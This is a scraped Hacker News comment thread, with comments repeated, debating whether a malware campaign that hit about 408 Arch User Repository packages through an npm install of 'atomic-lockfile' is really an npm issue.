← Back to context Comment by Retr0id 7 days ago This doesn't really have anything to do with npm. 5 comments Retr0id Reply notabotiswear 7 days ago From the Arch mailing list [0]>The result is a rather long list of ~408 packages all doing npm install atomic-lockfile something something[0] https://lists.archlinux.org/archives/list/aur-general@lists.... Retr0id 7 days ago They could've pip installed, curl|sh'd or anything else, it's not relevant to the underlying issue. notabotiswear 7 days ago Perhaps there were other vectors, but npm was the one used here.And yes, this is an AUR issue, but npm being used to host and dissiminate malware is also [a chronic] one, even if separate. vitamark 7 days ago anything except that it's malware installed via npm Retr0id 7 days ago As you can see here, they've already switched it out for a different command, likely due to incident responders over-indexing on npm as an IOC.https://news.ycombinator.com/item?id=48503258
notabotiswear 7 days ago From the Arch mailing list [0]>The result is a rather long list of ~408 packages all doing npm install atomic-lockfile something something[0] https://lists.archlinux.org/archives/list/aur-general@lists.... Retr0id 7 days ago They could've pip installed, curl|sh'd or anything else, it's not relevant to the underlying issue. notabotiswear 7 days ago Perhaps there were other vectors, but npm was the one used here.And yes, this is an AUR issue, but npm being used to host and dissiminate malware is also [a chronic] one, even if separate.
Retr0id 7 days ago They could've pip installed, curl|sh'd or anything else, it's not relevant to the underlying issue. notabotiswear 7 days ago Perhaps there were other vectors, but npm was the one used here.And yes, this is an AUR issue, but npm being used to host and dissiminate malware is also [a chronic] one, even if separate.
notabotiswear 7 days ago Perhaps there were other vectors, but npm was the one used here.And yes, this is an AUR issue, but npm being used to host and dissiminate malware is also [a chronic] one, even if separate.
vitamark 7 days ago anything except that it's malware installed via npm Retr0id 7 days ago As you can see here, they've already switched it out for a different command, likely due to incident responders over-indexing on npm as an IOC.https://news.ycombinator.com/item?id=48503258
Retr0id 7 days ago As you can see here, they've already switched it out for a different command, likely due to incident responders over-indexing on npm as an IOC.https://news.ycombinator.com/item?id=48503258
From the Arch mailing list [0]
>The result is a rather long list of ~408 packages all doing npm install atomic-lockfile something something
[0] https://lists.archlinux.org/archives/list/aur-general@lists....
They could've pip installed, curl|sh'd or anything else, it's not relevant to the underlying issue.
Perhaps there were other vectors, but npm was the one used here.
And yes, this is an AUR issue, but npm being used to host and dissiminate malware is also [a chronic] one, even if separate.
anything except that it's malware installed via npm
As you can see here, they've already switched it out for a different command, likely due to incident responders over-indexing on npm as an IOC.
https://news.ycombinator.com/item?id=48503258